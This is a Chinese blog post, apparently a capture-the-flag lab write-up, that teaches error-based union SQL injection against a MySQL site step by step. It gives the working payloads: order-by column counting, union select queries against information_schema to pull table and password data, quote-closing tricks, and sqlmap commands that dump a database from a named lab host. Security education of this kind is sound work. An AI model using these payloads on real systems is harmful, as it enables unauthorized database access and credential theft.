sql注入-显错注入

最新推荐文章于 2024-04-22 22:12:16 发布
最新推荐文章于 2024-04-22 22:12:16 发布
阅读量923 收藏 3
点赞数 2
分类专栏: 网络安全 文章标签: sql database 网络安全 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43754351/article/details/124688899
版权

sql注入的核心:将用户的输入拼接到代码中,并被当做sql语句执行

第一步;判断是否存在sql注入一般url栏中?表示传参例如判断是否存在注入:and 1=2(重点是看我们的输入是否有被当做代码执行)也可以用sleep()函数来判断是否存在注入(5表示延时五秒),也可以用减法来进行判断,例如id=2-1等,用加法时注意+要使用%2B代替,因为+有特殊含义。

存在注入就可以进行下一步

第二步:判断字段数order by 1(正常) order by 2(正常)order by 3(异常)说明仅仅存在两个字段

 

如上图所示order by 2 显示正常,order by 3显示异常即可判断存在两个字段

第三步:判断显错位 ?id=1.1 union select 1,2 因为是两个字段数所以select 1,2 三个就是select 1,2,3以此类推

union select 是MySQL数据库中的联合查询语句,联和查询前面的sql语句要和后面sql语句字段数一致,这个也是我们前面判断字段数的原因,
联和查询时需要让前面查询语句查询不出数据,从而显示我们后面联和查询的结果,id=1.1,是给个错误的id使前面语句查不出数据,从而使页面显示联合查询后面的数据。

如图可以看出显错位是第二位,接下来就可以把2替换为查询语句 

第三步:查库名?id=1.1 union select 1,database()

 得到库名为maoshe

接下来就可以继续查表名 union select 1,table_name from information_schema.tables where table_schema='maoshe' limit 0,1 

information_schema.tables 是MySQL数据库中特有的表用来存数据库中所有表名,我们就可以利用这张表来查询我们需要的表名

limit 0,1 是用来限制输出的函数,0是输出第几位,从0开始0表示第一位,1是输出个数1表示一个,为什么要限制输出呢,主要是因为如果不限制输出,页面一般只显示默认的一个表,这样我们看不到其他表名,用limit 0,1 通过不断修改来依次查看查询出来的表名 limit 1,1 就是查看第二个,依次类推。

我们得到表名为admin,接下来查字段名union select 1,column_name from information_schema.columns where table_schema='maoshe' and table_name='admin' limit 2,1 因为所需字段名在第三位里面所以limit 2,1

 information_schema.columns同样是MySQL自带的存字段名的一张表

得到字段名为password最后一步查数据得到flag ,      union select 1,password from admin 

得到flag 为hellohack 

有些开发在传参是使用了   ''   ""  ('')   ("") ,我们在注入时则要先对其进行闭合再写查询语句,后面还有对其后面内容进行注释掉,常见使用 '   "    ')   ")这四种方式来闭合,查询语句后面加上 -- q注意--和q 之间有一个空格 q 可以随便换

 

例如:语句为?id=1.1 union select 1,2,database() -- q  这里是有三个字段的

这里使用了') 进行闭合查询 ,在使用sqlmap是最好手动加上闭合例如:http://xxxx.com/xx.php/?id=1')

以上是手工注入的方法,接下来演示通过工具sqlmap来跑出flag

1.在sqlmap所在目录打开cmd输入 python sqlmap.py -u http://rhiq8003.ia.aqlab.cn/?id=1 -risk 2 -level 3     -u 接网址 -risk 2 设定语句丰富度,-level 3 等级越高越完整

 2. python sqlmap.py -u http://rhiq8003.ia.aqlab.cn/?id=1 -risk 2 -level 3 --dbs

--dbs 跑库名

3. python sqlmap.py -u http://rhiq8003.ia.aqlab.cn/?id=1 -risk 2 -level 3 -D maoshe --table 

--tables 跑表名 -D 指定库

 4.python sqlmap.py -u http://rhiq8003.ia.aqlab.cn/?id=1 -risk 2 -level 3 -D maoshe -T admin --dump本应该接着使用--columns跑字段名,这里偷懒直接跑admin表里的数据 -T表示指定表,        --dump表示跑数据(实战慎用)

 

Kingjh26
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
10-sql注入-mysql注入1
08-03
1.路径符号:要用双斜杠 \\ ,或者 / 2.转换为十六进制数,这样就不需要引号了 1.报错显示 3.遗留文件 phpinfo info test php 5
SQL回显注入
时之海
02-14 890
0x00 注入过程 三种注入 where user_id = 1 or 1=1 where user_id = '1' or '1'='1' where user_id =" 1 "or "1"="1" 注释符 # 单行注释,常编码为%23 --空格 单行注释 注意为短线短线空格 /*()*/ 多行注释 至少存在俩处的注入 /**/常用来作为空格 判断字段数 order by 确定回显点 union select 1,2 查询数据库信息 ver
实验记录一之SQL注入
qq_54580973的博客
05-07 255
这只是我一次实验过程的记录!!!! DVWA(Damn Vulnerable Web Application)是randomstorm的一个开源项目。一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 安装部署phpStudy+DVWA漏洞演练平台 安装phpstudy,安装完成后启动phpStudy主界面,当看到 Apache 和 MySQL 文字后面红色的圆点变成绿色,表示服务启动成
SQL注入及防止--传入非法参数 IDEA+JAVA
qq_63321473的博客
08-15 1549
SQL注入即是指 web应用程序中数据库层的安全漏洞,因为没有对用户输入数据的合法性没有判断或过滤,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的 SQL语句 ,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。...
SQL注入
weixin_33856370的博客
08-14 88
2019独角兽企业重金招聘Python工程师标准>>> ...
SQL注入--显错注入
weixin_48803011的博客
12-14 641
显错注入就是通过sql注入再利用网页的显示位进行数据的读取
CTF学习笔记——SQL注入
xuanyulevel6的博客
08-25 4250
以pikachu靶场练习来学习ctf知识
SQL注入:初步体验Sqlmap
kali_Ma的博客
06-09 896
目录 Sqlmap Sqlmap 是一个开源的渗透测试工具,可以自动检测和利用 SQL 注入缺陷以及接管数据库服务器的过程。它有一个强大的检测引擎,许多针对最终渗透测试人员的小众功能,以及从数据库指纹、从数据库获取数据、访问底层文件系统和通过带外连接在操作系统上执行命令等广泛的开关。 安装 pip install sqlmap 查看帮助文档 sqlmap -hh 中文文档 https://sqlmap.campfire.ga/ 直连数据库 服务型数据库(mysql) DBMS://USER:PASSWORD
SQL注入-显错注入
学习、分享、交流
05-13 4247
什么是SQL注入 : 用户输入的内容被浏览器当做数据库语句进行执行。 关键点:我们一定要输入[数据库语句] 。 我们输入【数据库语句】,如果这个网站执行了,就说明这个网站,存在数据库注入漏洞。
详解SQL注入--安全(二)
09-09
主要介绍了SQL注入安全,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
SQL注入-概述-ppt.pptx
10-27
SQL相关资料
SQL注入-防范-ppt.pptx
10-27
SQL相关资料
SQL注入-xiabee1
08-03
1.1 安装靶场 1.2 手工注入 1.2.1 联合查询注入 1.2.2 报错注入 1.3 源码审计
Python + SQLAlchemy操作MySQL数据库(ORM)
上庸者-不服周
04-19 275
SQLAlchemy是用Python编程语言开发的一个开源项目。它提供了SQL工具包和ORM(对象关系映射)工具,使用MIT许可证发行。SQLAlchemy采用简单的Python语言,提供高效和高性能的数据库访问,实现了完整的企业级持久模型。它的理念是SQL数据库的量级和性能比对象集合重要,而对象集合的抽象又重要于表和行。
如何在PostgreSQL中创建并使用窗口函数来进行复杂的分析查询?
墨松笔记
04-22 930
窗口函数是 PostgreSQL 中一个非常强大的特性,它们允许用户对查询结果的每一行执行复杂的计算。通过了解窗口函数的基本概念、常用的窗口函数以及如何使用它们,您可以执行各种复杂的分析查询并生成有价值的报告。上述示例只是窗口函数应用的冰山一角,实际上窗口函数可以与其他 SQL 特性(如连接、子查询等)结合使用,以执行更复杂的任务。PostgreSQL 提供了一套强大的窗口函数(Window Functions),这些函数允许用户对查询结果的每一行执行计算,同考虑到与当前行相关的其他行。
SQL表连接详解:JOIN与逗号(,)的使用及其性能影响
好好学习日记
04-17 1072
在这个详细的解释中,我们将深入探讨SQL中表连接的概念,特别是JOIN和逗号(,)在连接表的不同用法及其对查询性能的影响。通过实际示例和背后的逻辑分析,我们将揭示在不同场景下选择哪种连接方式更为合适。
探秘数据库中间件:ProxySQL与MaxScale的优势与劣势
todoitbo的博客
04-22 1083
本文将深入探讨两个流行的数据库负载均衡中间件ProxySQL和MaxScale的功能、特点以及适用场景。我们将比较两者的优劣势,并提供选择和配置的建议,帮助读者了解如何在自己的数据库架构中选择合适的解决方案。
苍穹外卖day10(1)Spring Task、 订单状态定处理
最新发布
qq_51076441的博客
04-22 474
Spring Task用于在指定间处理某个业务逻辑,在本项目中体现在订单状态定处理,包括“下单后未支付(订单超自动取消)”、“订单一直处于派送中状态(订单需要自动更新成已完成)”。实现的业务逻辑通过当前订单状态和下单间去查询订单,对于满足上面两个条件的订单,设置一个间让任务自动执行。Spring框架提供的任务调度工具,可以按照约定的间自动执行某个代码逻辑。应用场景信用卡每月还款提醒银行贷款每月还款提醒火车票售票系统处理未支付订单入职纪念日为用户发送通知。
解决方案:用决策树算法如何生成决策树图及生成SQL规则
weixin_42504788的博客
04-19 788
解决方案:用决策树算法如何生成决策树图及生成SQL规则
sql注入-pikachu靶场
10-13
SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过构造恶意的SQL语句来获取或篡改数据库中的数据。在Pikachu靶场中,可以通过注入恶意的SQL语句来获取管理员账户的密码。具体步骤如下: 1. 在登录页面输入用户名...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值